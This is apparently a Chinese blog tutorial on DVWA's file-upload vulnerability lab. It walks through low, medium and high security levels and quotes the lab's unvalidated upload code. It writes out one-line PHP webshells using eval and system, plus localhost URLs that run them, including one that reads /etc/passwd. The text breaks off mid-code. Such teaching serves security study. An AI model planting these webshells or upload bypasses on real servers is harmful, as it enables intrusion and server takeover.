DVWA靶场--文件上传漏洞(low、medium、high等级)

本文详细介绍了DVWA靶场中低中高三安全等级下的Webshell上传漏洞,包括文件上传限制及绕过技巧。在Low等级下,可通过上传一句话木马并使用蚁剑连接进行操作;Medium等级增加了Content-Type限制,利用Burpsuite修改类型可绕过;High等级限制了文件后缀,通过%00截断或图片木马尝试上传,但仅能通过文件包含漏洞执行。文章还提及了MIME类型和中国蚁剑的使用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DVWA靶场实践-低中高三个安全等级

关于Webshell
Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。
小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。
shell2.php #eval使用php函数,例如phpinfo( )

<?php eval($_REQUEST[‘cmd’]);?>

http://127.0.0.1/dvwa/hackable/iploads/shell2.php?cmd=phpinfo();

shell3.php #system使用linux系统命令,例如ls,cp,rm

<?php system($_REQUEST[‘yangge’]);?>

http://127.0.0.1/dvwa/hackable/iploads/shell3php?yangge=cat /etc/password

<?php eval($_POST[‘chopper’]);?>

说明:REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构。

安全等级:Low

查看码源:对上传的文件没有进行检测。

<?php 

if( isset( $_POST[ 'Upload' ] ) ) {
    
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
    
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else {
    
        // Yes! 
        echo "<pre>{
     $target_path} succesfully uploaded!</pre>"<
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值